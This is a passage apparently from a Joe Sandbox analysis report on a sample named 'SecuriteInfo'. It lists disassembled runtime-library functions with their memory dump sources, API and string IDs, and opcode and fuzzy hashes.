                                                                                                      • Opcode Fuzzy Hash: 5e8a7a31c33a269a59c1538be2bd036b2d1bd0459060e45bf358329a224fa751
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      Function 00007FF6C785DBC0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 224COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 459529453-1866435925
                                                                                                      • Opcode ID: 0f7fa71a9fe66e1fc95adaf3505383be2ab9a784402976e13fa3ff9bca43f5ea
                                                                                                      • Instruction ID: 7f1d1cc578da2c72753a30e0ff6af965e3afc371a3d9bd4b4df467a8a28ebe0c
                                                                                                      • Opcode Fuzzy Hash: 0f7fa71a9fe66e1fc95adaf3505383be2ab9a784402976e13fa3ff9bca43f5ea
                                                                                                      • Instruction Fuzzy Hash: 5491AC32A0AA8696EB54DF15E4853B97BA0FB84B92F544132DF8E837A4DF7CD845C300
                                                                                                      Function 00007FF6C786E978 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$f$p$p$f
                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                      • Opcode ID: ef20db07cd8982639cb62bae59e5f91ae9733d25f82086f8cb52826f578afae3
                                                                                                      • Instruction ID: 7131050cac52195a3804cc435858655a2b5776e9d9e2a362bea6716d67400452
                                                                                                      • Opcode Fuzzy Hash: ef20db07cd8982639cb62bae59e5f91ae9733d25f82086f8cb52826f578afae3
                                                                                                      • Instruction Fuzzy Hash: DD12A521A2E143A6FB205F14E0487B97AA5FB40752F984131E7D9C75C4DF7CEA80CB21
                                                                                                      Function 00007FF6C786A42C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 849930591-393685449
                                                                                                      • Opcode ID: 423362bbb715d2795c057120a6b42bd2485c1799cc69fa04143f818ce7cdd50b
                                                                                                      • Instruction ID: e8f562bb088ec53a3f36fdd455aa0af60d3a7db0084232bfacd37e316287c43b
                                                                                                      • Opcode Fuzzy Hash: 423362bbb715d2795c057120a6b42bd2485c1799cc69fa04143f818ce7cdd50b
                                                                                                      • Instruction Fuzzy Hash: 28D18A22A297419AEB209F65D4803AD7BA4FB45B89F100135EBCDD7B96DF3CE681C701
                                                                                                      Function 00007FF6C7861EF0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 221COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID: invalid string position
                                                                                                      • API String ID: 2081738530-1799206989
                                                                                                      • Opcode ID: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction ID: 975f76fc7e580391abf3ab05fb83125a7c336c65300843254a45a71eac6a4566
                                                                                                      • Opcode Fuzzy Hash: fb0e87724d7bafdbaa693a83112c149b3eaf14ca156fab27724b0630734682c2
                                                                                                      • Instruction Fuzzy Hash: D0819322A1AA4295EE15DF19D8402B97B60FB84BE6F188131DF9DC77A5DF3DE542C300
                                                                                                      Function 00007FF6C787B2D4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                      • API String ID: 3013587201-537541572
                                                                                                      • Opcode ID: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction ID: 399819887e29313256d796c49167d550b6f183e0dfef1d2b1b8373ec075c0074
                                                                                                      • Opcode Fuzzy Hash: 720a303292af339a0c062d452de7dc2e26e36da20086ac8bab5a24fa68cd03b5
                                                                                                      • Instruction Fuzzy Hash: 0941D321B1BA0241EA15CF16A8506762ED6BF05FA2F494235EF9FC7B94EE3CE4458300
                                                                                                      Function 00007FF6C7879A64 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: f$p$p
                                                                                                      • API String ID: 3215553584-1995029353
                                                                                                      • Opcode ID: 287f793cd9e57a200f6c54826b9ebc593c668fda19194eebe723da172aebf24d
                                                                                                      • Instruction ID: a7a35da4ec52863c84017b5839fd065d0ca17dc85abc68a6843ebf5f58d1df13
                                                                                                      • Opcode Fuzzy Hash: 287f793cd9e57a200f6c54826b9ebc593c668fda19194eebe723da172aebf24d
                                                                                                      • Instruction Fuzzy Hash: 66125862B0E14286FB249F29D1542BA7EA1FB80756F844435F7CBC66C4DF7CE9808B15
                                                                                                      Function 00007FF6C7880BE4 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 543e3b3d023cc5dc721e80ffbc244158559b423821014bc6dfd7f15a78ec0d0f
                                                                                                      • Instruction ID: bf627df96927e53d709f3627ba46cc43acd3c173b5ecb7030d5660805d8d4426
                                                                                                      • Opcode Fuzzy Hash: 543e3b3d023cc5dc721e80ffbc244158559b423821014bc6dfd7f15a78ec0d0f
                                                                                                      • Instruction Fuzzy Hash: 2EC1C322A0EA8B91E7609F5594402BE7F91FF91B92F554136EBCE833D2DE7CE8558300
                                                                                                      Function 00007FF6C7852050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1386471777-1405518554
                                                                                                      • Opcode ID: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction ID: 1473d137b71d0e085572a67a9df962ad74ed4253a364edea5b10ac84e185fdf8
                                                                                                      • Opcode Fuzzy Hash: 2fb573258588d9a0732103de3035a81878e4e8febdd76704b08a3a214b084dd1
                                                                                                      • Instruction Fuzzy Hash: 60518922B0AB819AFB54DFB0E4902BD3B70AF54748F044134DF8EA7A56DF38E6568304
                                                                                                      Function 00007FF6C786CD6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                      • Opcode ID: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction ID: 7ca2af19205049faba0e6ee5ff4f3d3523210f2c9744244720a872b3872473a3
                                                                                                      • Opcode Fuzzy Hash: d6d876a61148c08aaa09cadfa9bfd10722785b3aceef806c8e2bf92c7e5e0abf
                                                                                                      • Instruction Fuzzy Hash: D731C725B2BB42A1EE569F56E81067A2BA4BF04BA2F590534DF9DC7790EF3CF5408340
                                                                                                      Function 00007FF6C787AB80 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 2506987500-0
                                                                                                      • Opcode ID: c8853e8a3b321125545d4609aa27e3826c7d41d29c11e989b72c0040a7f4de7f
                                                                                                      • Instruction ID: 9d74db9aba0f545d0848da4edc0482c914672a1e875e2e9a2e4a94ef936f9f83
                                                                                                      • Opcode Fuzzy Hash: c8853e8a3b321125545d4609aa27e3826c7d41d29c11e989b72c0040a7f4de7f
                                                                                                      • Instruction Fuzzy Hash: 96217C20B0F64742FA596F2559561795D43AF84BB2F048A34FBBFC6BDADE6CA4404201
                                                                                                      Function 00007FF6C788C03C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CONOUT$
                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                      • Opcode ID: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction ID: 0885ad5294bbfd4b9d5870df51772e85780f8392db4779ddb082b67aa6fd10e3
                                                                                                      • Opcode Fuzzy Hash: 150489296217e134fac2ce95dd32539a7224101ed53f0799fee9b0db1a451bf2
                                                                                                      • Instruction Fuzzy Hash: 5511B621B19B4286E7908F12E844329ABA0FB98FF6F004234EB9DC7B94CF7DD9148740
                                                                                                      Function 00007FF6C78673DC Relevance: 9.2, APIs: 6, Instructions: 206COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 2829165498-0
                                                                                                      • Opcode ID: e4ed64d3a57ea52230228e3d5e3b447285539304acb0981b31f043c28c02cd31
                                                                                                      • Instruction ID: f0b77afd60cc3e837bb016d02a4e874460bc90007d525e1e2a6b73690c487ad1
                                                                                                      • Opcode Fuzzy Hash: e4ed64d3a57ea52230228e3d5e3b447285539304acb0981b31f043c28c02cd31
                                                                                                      • Instruction Fuzzy Hash: 1B81BF72A1A78296EF608F25E4442697BE1FB44BA9F140631EB9DC7BD8EF3CD5008740
                                                                                                      Function 00007FF6C7862740 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction ID: 4cba58534150c833cff0b3ec5d760aad8468472eb4cc89a590c41f60220bb9be
                                                                                                      • Opcode Fuzzy Hash: 0117289e98df00da582755afb24c31f3f504ef9a4471fb3c4949e3d48aaf6a78
                                                                                                      • Instruction Fuzzy Hash: 2C31BE26A1BA42A0EA15DF55E8041B96B60FB94BA2F584231DFEDC73E5EF3CE541C300
                                                                                                      Function 00007FF6C7863270 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction ID: 64058f12157e94d4bbb4ac50dcd866e06a34aa6c80a76e4c125ab89e9f004e36
                                                                                                      • Opcode Fuzzy Hash: 3c0f3d2b7e2db67fea3719f7c25c5b52825845983d8d7121c0e12f2b9b1ab6b5
                                                                                                      • Instruction Fuzzy Hash: D831AF22A1AA42A5EA159F16E94417D6B60FB54BA6F480131DFEDC37E5EF3CE641C300
                                                                                                      Function 00007FF6C7863690 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: 43d25b79fa40fe7f9d6a89727c4015db81dd33ed5e2c0de3b2d10e90f1ab0995
                                                                                                      • Instruction ID: 810aa1e1976f9866c4ff4c78df6f870e025b01f6213c850d9c8171a53854c35a
                                                                                                      • Opcode Fuzzy Hash: 43d25b79fa40fe7f9d6a89727c4015db81dd33ed5e2c0de3b2d10e90f1ab0995
                                                                                                      • Instruction Fuzzy Hash: FA31A165A1AA42A5EE159F15E8001796BA0FF55BA2F080231DFEDC77E5EF3CE541C300
                                                                                                      Function 00007FF6C78653BC Relevance: 9.1, APIs: 6, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                      • String ID:
                                                                                                      • API String ID: 2081738530-0
                                                                                                      • Opcode ID: f6812382aaee9de914e41b5e315eb5c79504e231bd5c19e353e7ca146bf2b575
                                                                                                      • Instruction ID: 5ebb11b3d5663c105fac570ca907aa5e9d5875fe381f5a9c0832a0fad0a29ae5
                                                                                                      • Opcode Fuzzy Hash: f6812382aaee9de914e41b5e315eb5c79504e231bd5c19e353e7ca146bf2b575
                                                                                                      • Instruction Fuzzy Hash: E4316061A1BA46A1FF159F55E4402786B61EB54BA2F180131DBADC77E5EF3CE542C300
                                                                                                      Function 00007FF6C786A8FC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
